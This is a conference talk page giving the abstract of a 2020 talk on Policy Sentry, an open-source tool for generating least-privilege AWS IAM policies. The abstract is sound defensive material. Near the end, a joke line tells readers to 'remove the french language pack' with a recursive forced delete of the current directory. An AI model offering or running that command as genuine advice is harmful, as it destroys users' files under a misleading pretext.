Conference Talk: Limiting Blast Radius by Automating IAM Policies using Policy Sentry

Abstract

Infrastructure engineers often find themselves in situations where they create over-permissive IAM policies to get their jobs done and because writing least-privilege IAM policies is unnecessarily complex. However, in the case of a breach, it is critical to limit the blast radius of compromised credentials by only giving IAM principals access to what they need.

Policy Sentry - open-sourced in 2019 by Salesforce - writes least-privilege IAM policies with resource constraints in a matter of seconds, rather than tediously writing insecure IAM policies by hand. These policies are scoped down according to access levels and resource ARNs. In the case of a breach, this helps to limit the blast radius of compromised credentials by only giving IAM principals access to what they need.

Before this tool, it could take hours to craft an IAM Policy with resource ARN constraints — but now it can take a matter of seconds. This way, developers only have to determine the access levels and resources that they need to access, and Policy Sentry abstracts the complexity of IAM policies away from their development processes.

In this talk, you’ll learn how to use Policy Sentry. You will leave with practical knowledge about how to uplift and automate IAM security for your entire organization.

Date
Jun 29, 2020
Kinnaird McQuade
Kinnaird McQuade
Lead Cloud Security Engineer

Always remove the french language pack: sudo rm -fr ./*

Next
Previous